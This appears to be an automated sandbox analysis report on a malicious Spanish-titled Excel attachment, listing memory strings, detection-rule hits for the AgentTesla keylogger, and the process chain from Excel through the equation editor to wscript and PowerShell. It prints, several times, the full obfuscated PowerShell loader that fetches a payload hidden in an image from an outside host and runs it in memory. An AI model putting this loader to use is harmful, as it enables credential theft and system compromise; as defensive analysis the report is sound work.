                  Source: AddInProcess32.exe, 00000008.00000002.478863572.0000000002511000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.478863572.00000000025AE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.478863572.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.618799471.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.618799471.000000000251B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.618799471.00000000025AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: powershell.exe, 00000006.00000002.481125469.0000000003AA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.481125469.0000000003499000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.478863572.0000000002511000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.478863572.00000000025AE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.478369752.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.618799471.000000000251B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.618799471.00000000025AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                  Source: powershell.exe, 00000006.00000002.481125469.0000000003359000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: powershell.exe, 00000006.00000002.479060921.0000000002331000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.478863572.0000000002511000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.478863572.00000000025AE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.618799471.000000000251B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.618799471.00000000025AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: AddInProcess32.exe, 00000009.00000002.618799471.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                  Source: powershell.exe, 00000006.00000002.481125469.0000000003AA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.481125469.0000000003499000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.478369752.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: powershell.exe, 00000006.00000002.481125469.0000000003359000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000006.00000002.481125469.0000000003359000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000006.00000002.481125469.0000000003359000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000006.00000002.481125469.0000000003359000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: powershell.exe, 00000006.00000002.479060921.000000000246A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
                  Source: powershell.exe, 00000006.00000002.479060921.000000000246A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/806/083/original/new_image.jpg?1719607612
                  Source: powershell.exe, 00000006.00000002.479060921.000000000246A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/806/083/original/new_image.jpg?1719607612Ama;
                  Source: powershell.exe, 00000006.00000002.479060921.000000000246A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235
                  Source: powershell.exe, 00000006.00000002.479060921.000000000246A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235Ama;
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: 6.2.powershell.exe.3aa4df8.2.raw.unpack, 8WWn.cs.Net Code: lLRvJ

                  System Summary

                  barindex
                  Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
                  Source: 6.2.powershell.exe.3aa4df8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 6.2.powershell.exe.3aa4df8.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 6.2.powershell.exe.3aa4df8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 6.2.powershell.exe.3aa4df8.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 2200, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2799
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2799Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\ProgIDJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgIDJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama; t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' { Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag); if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth = t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes = [System.Convert]::FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes); t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma); t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]] (Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma)) } }Set Scriptblock t0vlink = Amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612Am'+'a; t0vwebClient = New-O'+'bject System.Net.WebClien'+'t; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch { Write-Host AmaFailed To download data from t0vlinkAma -ForegroundColor Red; exit }; if (t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UTF8.'+'GetString(t0vdownloadedData); t0vstartFlag '+'= Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END'+'>>Ama; t0vstartIndex = t'+'0vi'+'mageText.IndexOf(t0vstartFlag'+'); t0vendIndex = t0vimageText.Index'+'Of(t0vendFlag); if (t0vstartIndex '+'-g'+'e 0 -and t0vendIndex -gt t0vstartIndex) { '+'t0vstartIndex += t0vstartFlag.Length; t0vbase64L'+'ength = t0vendIndex - t0vstartIndex; t0vbase64Command'+' = t0vimageText.Substring(t0vstartIndex, t0vbase64Length); t0vcommandB'+'ytes = [Sy'+'stem.Convert]:'+':FromBase64String(t0vbase64Command); t0vloadedAssembly = [System.Reflection.Assembly]::Load(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , AmadesativadoAma , AmadesativadoAma,AmaAddInProcess32Ama,AmadesativadoAma)) } }').RepLAce('t0v','$').RepLAce(([ChaR]65+[ChaR]109+[ChaR]97),[STrINg][ChaR]39) )"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama; t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' { Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag); if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth = t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes = [System.Convert]::FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes); t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma); t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]] (Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma)) } }Set Scriptblock t0vlink = Amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612Am'+'a; t0vwebClient = New-O'+'bject System.Net.WebClien'+'t; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch { Write-Host AmaFailed To download data from t0vlinkAma -ForegroundColor Red; exit }; if (t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UTF8.'+'GetString(t0vdownloadedData); t0vstartFlag '+'= Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END'+'>>Ama; t0vstartIndex = t'+'0vi'+'mageText.IndexOf(t0vstartFlag'+'); t0vendIndex = t0vimageText.Index'+'Of(t0vendFlag); if (t0vstartIndex '+'-g'+'e 0 -and t0vendIndex -gt t0vstartIndex) { '+'t0vstartIndex += t0vstartFlag.Length; t0vbase64L'+'ength = t0vendIndex - t0vstartIndex; t0vbase64Command'+' = t0vimageText.Substring(t0vstartIndex, t0vbase64Length); t0vcommandB'+'ytes = [Sy'+'stem.Convert]:'+':FromBase64String(t0vbase64Command); t0vloadedAssembly = [System.Reflection.Assembly]::Load(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , AmadesativadoAma , AmadesativadoAma,AmaAddInProcess32Ama,AmadesativadoAma)) } }').RepLAce('t0v','$').RepLAce(([ChaR]65+[ChaR]109+[ChaR]97),[STrINg][ChaR]39) )"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00295C7A6_2_00295C7A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00294D7D6_2_00294D7D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00298F176_2_00298F17
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0029C7746_2_0029C774
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00298FD96_2_00298FD9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_002038F08_2_002038F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_002088C88_2_002088C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_002049108_2_00204910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0020F4E88_2_0020F4E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0020BD088_2_0020BD08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00203C388_2_00203C38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0020DF4B8_2_0020DF4B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_005B18608_2_005B1860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_002D38F09_2_002D38F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_002D49089_2_002D4908
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_002DF4E09_2_002DF4E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_002DBDC89_2_002DBDC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_002D3C389_2_002D3C38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_005218609_2_00521860
                  Source: orden de compra.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
                  Source: 6.2.powershell.exe.3aa4df8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 6.2.powershell.exe.3aa4df8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 6.2.powershell.exe.3aa4df8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 6.2.powershell.exe.3aa4df8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: Process Memory Space: powershell.exe PID: 2200, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 6.2.powershell.exe.3aa4df8.2.raw.unpack, G39cBQ.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.3aa4df8.2.raw.unpack, G39cBQ.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.3aa4df8.2.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.3aa4df8.2.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.3aa4df8.2.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.3aa4df8.2.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.3aa4df8.2.raw.unpack, b1PPCKov2KZ.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.3aa4df8.2.raw.unpack, b1PPCKov2KZ.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@10/8@3/4
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$orden de compra.xlam.xlsxJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7F8B.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`..................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................x..................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................'.=.'...(.P.....................x..................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................x..................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0.9.5..............................s....................&.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................x..................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................x..................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................x..................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................x.......'..........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................x.......3..........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................E..........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Q..........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.d.i.n.g.E.x.c.e.p.t.i.o.n.......d..........................s....................".......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................q..........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . ...C.o.m.m.a.n.d.s...S.e.t.V.a.r.i.a.b.l.e.C.o.m.m.a.n.d......s....................>.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P........................................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: orden de compra.xlam.xlsxReversingLabs: Detection: 68%
                  Source: orden de compra.xlam.xlsxVirustotal: Detection: 47%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\portugalslovenia.js"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama; t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' { Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag); if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth = t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes = [System.Convert]::FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes); t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma); t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]] (Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma)) } }Set Scriptblock t0vlink = Amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612Am'+'a; t0vwebClient = New-O'+'bject System.Net.WebClien'+'t; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch { Write-Host AmaFailed To download data from t0vlinkAma -ForegroundColor Red; exit }; if (t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UTF8.'+'GetString(t0vdownloadedData); t0vstartFlag '+'= Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END'+'>>Ama; t0vstartIndex = t'+'0vi'+'mageText.IndexOf(t0vstartFlag'+'); t0vendIndex = t0vimageText.Index'+'Of(t0vendFlag); if (t0vstartIndex '+'-g'+'e 0 -and t0vendIndex -gt t0vstartIndex) { '+'t0vstartIndex += t0vstartFlag.Length; t0vbase64L'+'ength = t0vendIndex - t0vstartIndex; t0vbase64Command'+' = t0vimageText.Substring(t0vstartIndex, t0vbase64Length); t0vcommandB'+'ytes = 